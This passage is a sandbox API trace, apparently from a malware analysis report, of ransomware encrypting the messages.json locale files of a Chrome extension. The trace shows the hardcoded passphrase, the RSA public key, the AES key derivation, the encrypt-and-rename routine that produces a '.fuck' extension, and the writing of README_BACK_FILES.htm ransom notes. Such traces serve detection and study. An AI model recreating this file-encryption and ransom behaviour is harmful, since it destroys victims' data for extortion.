(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.121] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.123] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.123] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.123] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.123] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c200) returned 1 [0259.123] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.123] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.123] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6d108) returned 1 [0259.123] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6d108, dwCertEncodingType=0x1, pInfo=0x2e26480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e264b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e264b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c280) returned 1 [0259.124] CryptEncrypt (in: hKey=0x2e7c280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.124] CryptEncrypt (in: hKey=0x2e7c280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6c118*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6c118*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.124] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6c118*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6c118*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.125] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x29b, lpOverlapped=0x0) returned 1 [0259.126] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x29b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x2a0) returned 1 [0259.126] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x2a0, lpOverlapped=0x0) returned 1 [0259.130] CloseHandle (hObject=0x5d5c) returned 1 [0259.130] CloseHandle (hObject=0x5d60) returned 1 [0259.130] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0259.132] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0259.133] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0259.134] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0259.136] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.136] CryptDestroyKey (hKey=0x2e7c200) returned 1 [0259.136] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.136] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.137] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.137] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0259.137] AreFileApisANSI () returned 1 [0259.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 161 [0259.137] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.138] GetFileType (hFile=0x5d64) returned 0x1 [0259.138] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.139] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.139] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.140] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.140] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.140] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.140] GetLastError () returned 0x0 [0259.140] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json")) returned 0x20 [0259.140] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0259.141] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.141] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.142] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.142] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.146] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.146] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.146] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.146] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c700) returned 1 [0259.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.146] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6cd50) returned 1 [0259.146] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6cd50, dwCertEncodingType=0x1, pInfo=0x2e26d70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26da0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26da8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c580) returned 1 [0259.146] CryptEncrypt (in: hKey=0x2e7c580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.147] CryptEncrypt (in: hKey=0x2e7c580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6cdd8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6cdd8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.147] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e6cdd8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6cdd8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.147] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x261, lpOverlapped=0x0) returned 1 [0259.152] CryptEncrypt (in: hKey=0x2e7c700, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x261, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x270) returned 1 [0259.152] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x270, lpOverlapped=0x0) returned 1 [0259.165] CloseHandle (hObject=0x5d60) returned 1 [0259.165] CloseHandle (hObject=0x5d5c) returned 1 [0259.165] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0259.168] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0259.168] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.gsg")) returned 1 [0259.169] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\messages.json.fuck")) returned 1 [0259.170] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0259.170] CryptDestroyKey (hKey=0x2e7c700) returned 1 [0259.170] CryptReleaseContext (hProv=0x2e7b4f0, dwFlags=0x0) returned 1 [0259.170] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0259.170] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0259.170] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0259.171] AreFileApisANSI () returned 1 [0259.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0259.171] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0259.171] GetFileType (hFile=0x5d64) returned 0x1 [0259.171] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0259.172] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0259.172] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0259.173] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.173] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0259.173] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0259.173] GetLastError () returned 0x0 [0259.173] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json")) returned 0x20 [0259.173] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0259.174] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0259.174] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0259.175] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0259.175] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7b4f0) returned 1 [0259.177] CryptCreateHash (in: hProv=0x2e7b4f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0259.177] lstrlenA (lpString="QPmjqALrRVCjmscVAzZjjQwqzMlQm") returned 29 [0259.177] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb670, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0259.177] CryptDeriveKey (in: hProv=0x2e7b4f0, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7c480) returned 1 [0259.177] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----i", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0259.178] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0259.178] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e6c998) returned 1 [0259.178] CryptImportPublicKeyInfo (in: hCryptProv=0x2e6c998, dwCertEncodingType=0x1, pInfo=0x2e26f10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e26f40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e26f48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7c200) returned 1 [0259.178] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0259.178] CryptEncrypt (in: hKey=0x2e7c200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e6ce60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e6ce60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0259.178] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e6ce60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e6ce60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0259.179] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, 